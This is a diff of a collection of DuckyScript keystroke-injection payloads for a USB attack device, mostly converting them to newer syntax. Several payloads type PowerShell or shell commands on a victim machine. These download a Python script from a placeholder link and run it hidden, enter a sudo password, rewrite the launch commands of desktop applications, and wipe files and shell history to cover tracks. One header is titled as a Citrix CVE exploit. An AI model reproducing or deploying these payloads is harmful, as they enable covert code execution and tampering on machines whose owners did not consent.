||||
REM DELAY 500
|
||||
REM STRINGLN #SUDO-PSWD
|
||||
REM DELAY 3000
|
||||
REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
|
||||
REM STRINGLN exit
|
||||
REM_BLOCK
|
||||
Old script:
|
||||
STRINGLN sudo chmod +x #SCRIPT-NAME
|
||||
DELAY 500
|
||||
STRINGLN #SUDO-PSWD
|
||||
DELAY 3000
|
||||
STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
|
||||
STRINGLN exit
|
||||
END_REM
|
||||
|
||||
REM Optimized script
|
||||
STRINGLN sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit
|
||||
|
|
|
@ -1,34 +1,79 @@
|
|||
REM #######################################################################################################################
|
||||
REM # |
|
||||
REM # Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Incident Response |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM #######################################################################################################################
|
||||
REM_BLOCK
|
||||
#######################################################################################################################
|
||||
# #
|
||||
# Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Incident Response #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
#######################################################################################################################
|
||||
|
||||
REM PlugAndPlay <3
|
||||
PlugAndPlay <3
|
||||
|
||||
REM Requirements:
|
||||
REM - ExecutionPolicy Bypass
|
||||
Requirements:
|
||||
- ExecutionPolicy Bypass
|
||||
|
||||
REM Impact: Remote Code Execution
|
||||
REM Max Severity: Important
|
||||
Impact: Remote Code Execution
|
||||
Max Severity: Important
|
||||
|
||||
REM Mitigation:
|
||||
Mitigation:
|
||||
|
||||
REM - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
|
||||
- Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
|
||||
|
||||
REM - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
|
||||
- The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
|
||||
|
||||
REM The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
|
||||
The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
|
||||
|
||||
REM It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
|
||||
It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
|
||||
|
||||
REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
|
||||
Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
|
||||
END_REM
|
||||
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
GUI x
|
||||
DELAY 500
|
||||
STRING a
|
||||
|
|
|
@ -1,25 +1,27 @@
|
|||
REM ########################################################
|
||||
REM # |
|
||||
REM # Title : Defend Yourself From CVE-2023-23397 |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Incident-Response |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ########################################################
|
||||
REM_BLOCK
|
||||
########################################################
|
||||
# #
|
||||
# Title : Defend Yourself From CVE-2023-23397 #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Incident-Response #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
########################################################
|
||||
|
||||
REM PlugAndPlay <3
|
||||
PlugAndPlay <3
|
||||
|
||||
REM Requirements:
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM - PayloadStudio 1.3.1
|
||||
Requirements:
|
||||
- ExecutionPolicy Bypass
|
||||
- PayloadStudio 1.3.1
|
||||
|
||||
REM Impacted Products:
|
||||
REM - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
|
||||
Impacted Products:
|
||||
- All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
|
||||
|
||||
REM Mitigation:
|
||||
REM - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
|
||||
REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
|
||||
Mitigation:
|
||||
- Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
|
||||
Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
|
||||
END_REM
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM ################################################################################
|
||||
REM # #
|
||||
REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
|
||||
REM # Author : Aleff #
|
||||
REM # Version : 1.0 #
|
||||
REM # Category : incident-response #
|
||||
REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
|
||||
REM # #
|
||||
REM ################################################################################
|
||||
REM_BLOCK
|
||||
################################################################################
|
||||
# #
|
||||
# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : incident-response #
|
||||
# Target : Citrix NetScaler ADV; NetScaler Gateway #
|
||||
# #
|
||||
################################################################################
|
||||
END_REM
|
||||
|
||||
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
|
||||
DEFINE #HOSTNAME example
|
||||
|
|
|
@ -1,39 +1,79 @@
|
|||
REM_BLOCK
|
||||
####################################################
|
||||
# #
|
||||
# Title : Alien Message From Computer #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
####################################################
|
||||
|
||||
REM ####################################################
|
||||
REM # |
|
||||
REM # Title : Alien Message From Computer |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ####################################################
|
||||
Plug-And-Play <3
|
||||
|
||||
Requirements:
|
||||
- Internet Connection
|
||||
- ExecutionPolicy Bypass
|
||||
- Python
|
||||
END_REM
|
||||
|
||||
REM Plug-And-Play <3
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM - Python
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
STRINGLN powershell
|
||||
DELAY 1500
|
||||
|
||||
REM Create the file
|
||||
STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
|
||||
|
||||
REM Write the code into the file
|
||||
STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
|
||||
ENTER
|
||||
STRINGLN Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
|
||||
DELAY 1000
|
||||
|
||||
REM Execute the Python script
|
||||
STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||
ENTER
|
||||
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||
|
||||
REM Close the PowerShell
|
||||
DELAY 1000
|
||||
|
|
|
@ -1,36 +1,72 @@
|
|||
REM ######################################################
|
||||
REM # |
|
||||
REM # Title : Change Wallpaper With Screenshot |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ######################################################
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM - Python
|
||||
REM_BLOCK
|
||||
######################################################
|
||||
# #
|
||||
# Title : Change Wallpaper With Screenshot #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
######################################################
|
||||
|
||||
Requirements:
|
||||
- Internet Connection
|
||||
- ExecutionPolicy Bypass
|
||||
- Python
|
||||
END_REM
|
||||
|
||||
REM REQUIRED - Set your Python script link
|
||||
DEFINE SCRIPT-PY-LINK example.com
|
||||
DEFINE #SCRIPT-PY-LINK example.com
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
STRINGLN powershell
|
||||
DELAY 2000
|
||||
|
||||
|
||||
STRING Invoke-WebRequest -Uri "
|
||||
STRING SCRIPT-PY-LINK
|
||||
STRING " -OutFile "script.py"
|
||||
ENTER
|
||||
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||
|
|
|
@ -1,39 +1,58 @@
|
|||
REM ###########################################
|
||||
REM # |
|
||||
REM # Title : Change Desktop Wallpaper |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Linux (KDE based) |
|
||||
REM # |
|
||||
REM ###########################################
|
||||
REM_BLOCK
|
||||
###########################################
|
||||
# #
|
||||
# Title : Change Desktop Wallpaper #
|
||||
# Author : Aleff #
|
||||
# Version : 1.1 #
|
||||
# Category : Prank #
|
||||
# Target : Linux (KDE based) #
|
||||
# #
|
||||
###########################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
Requirements:
|
||||
- Internet Connection
|
||||
END_REM
|
||||
|
||||
REM Replace 'example.com/IMAGE_NAME' with your image link
|
||||
DEFINE #IMAGE_LINK example.com/IMAGE_NAME
|
||||
|
||||
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
|
||||
DEFINE #IMAGE_PATH="file://example.jpg"
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
REM Replace 'example.com/IMAGE_NAME' with your image link
|
||||
DEFINE IMAGE_LINK example.com/IMAGE_NAME
|
||||
STRING wget
|
||||
STRING IMAGE_LINK
|
||||
ENTER
|
||||
|
||||
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
|
||||
DEFINE IMAGE_PATH="file://example.jpg"
|
||||
STRINGLN wget #IMAGE_LINK
|
||||
|
||||
REM It depends by the Internet Connection
|
||||
DELAY 2000
|
||||
|
||||
STRING qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", "
|
||||
STRING IMAGE_PATH
|
||||
STRING ")}'
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
STRING rm -rf
|
||||
STRING IMAGE_PATH
|
||||
STRING ;history -c; exit;
|
||||
ENTER
|
||||
STRINGLN qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", "#IMAGE_PATH")}'; rm -rf #IMAGE_PATH;history -c; exit;
|
|
@ -1,46 +1,65 @@
|
|||
REM #######################################################
|
||||
REM # |
|
||||
REM # Title : Change The App That Will Be Runned |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : GNU/Linux (Debian based tested) |
|
||||
REM # |
|
||||
REM #######################################################
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - sudo permissions
|
||||
REM_BLOCK
|
||||
#######################################################
|
||||
# #
|
||||
# Title : Change The App That Will Be Runned #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : GNU/Linux (Debian based tested) #
|
||||
# #
|
||||
#######################################################
|
||||
|
||||
Requirements:
|
||||
- sudo permissions
|
||||
END_REM
|
||||
|
||||
REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
|
||||
DEFINE ORIGINAL_DESKTOP_FILE_NAME_1 example
|
||||
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_1 example
|
||||
DEFINE ORIGINAL_DESKTOP_FILE_NAME_2 example
|
||||
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_2 example
|
||||
DEFINE #ORIGINAL_DESKTOP_FILE_NAME_1 example
|
||||
DEFINE #ORIGINAL_DESKTOP_EXEC_COMMAND_1 example
|
||||
DEFINE #ORIGINAL_DESKTOP_FILE_NAME_2 example
|
||||
DEFINE #ORIGINAL_DESKTOP_EXEC_COMMAND_2 example
|
||||
|
||||
REM sudo permissions needed
|
||||
DEFINE SUDO example
|
||||
DEFINE #SUDO example
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
REM Open a shell
|
||||
DELAY 2000
|
||||
CTRL-ALT t
|
||||
DELAY 1000
|
||||
|
||||
STRING sudo sed -i '/^Exec=/s/.*/
|
||||
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_2
|
||||
STRING /'
|
||||
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_1
|
||||
STRINGLN sudo sed -i '/^Exec=/s/.*/ #ORIGINAL_DESKTOP_EXEC_COMMAND_2 /' #ORIGINAL_DESKTOP_FILE_NAME_1
|
||||
DELAY 500
|
||||
|
||||
STRING SUDO
|
||||
ENTER
|
||||
STRINGLN #SUDO
|
||||
DELAY 4000
|
||||
|
||||
STRING sudo sed -i '/^Exec=/s/.*/
|
||||
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_1
|
||||
STRING /'
|
||||
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_2
|
||||
STRINGLN sudo sed -i '/^Exec=/s/.*/#ORIGINAL_DESKTOP_EXEC_COMMAND_1/' #ORIGINAL_DESKTOP_FILE_NAME_2
|
||||
DELAY 1000
|
||||
ALT f4
|
||||
|
|
|
@ -1,27 +1,68 @@
|
|||
REM ####################################################
|
||||
REM # |
|
||||
REM # Title : Continuos Print In Terminal |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ####################################################
|
||||
REM_BLOCK
|
||||
####################################################
|
||||
# #
|
||||
# Title : Continuos Print In Terminal #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
####################################################
|
||||
|
||||
Plug And Play <3
|
||||
|
||||
REM Plug And Play <3
|
||||
Requirements:
|
||||
- Internet Connection
|
||||
- ExecutionPolicy Bypass
|
||||
- Python
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM - Python
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
STRINGLN powershell
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN (New-Object -ComObject WScript.Shell).SendKeys("{F11}")
|
||||
|
|
|
@ -1,36 +1,73 @@
|
|||
|
||||
REM ############################################
|
||||
REM # |
|
||||
REM # Title : Full-Screen Banner Joke |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ############################################
|
||||
REM_BLOCK
|
||||
############################################
|
||||
# #
|
||||
# Title : Full-Screen Banner Joke #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
############################################
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - Python installed
|
||||
REM - ExecutionPolicy Bypass
|
||||
|
||||
Requirements:
|
||||
- Internet Connection
|
||||
- Python installed
|
||||
- ExecutionPolicy Bypass
|
||||
END_REM
|
||||
|
||||
REM REQUIRED - Set your Python script link
|
||||
DEFINE SCRIPT-PY-LINK example.com
|
||||
DEFINE #SCRIPT-PY-LINK example.com
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
STRINGLN powershell
|
||||
DELAY 500
|
||||
|
||||
STRING Invoke-WebRequest -Uri "
|
||||
STRING SCRIPT-PY-LINK
|
||||
STRING " -OutFile "script.py"
|
||||
ENTER
|
||||
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
|
||||
DELAY 500
|
||||
|
||||
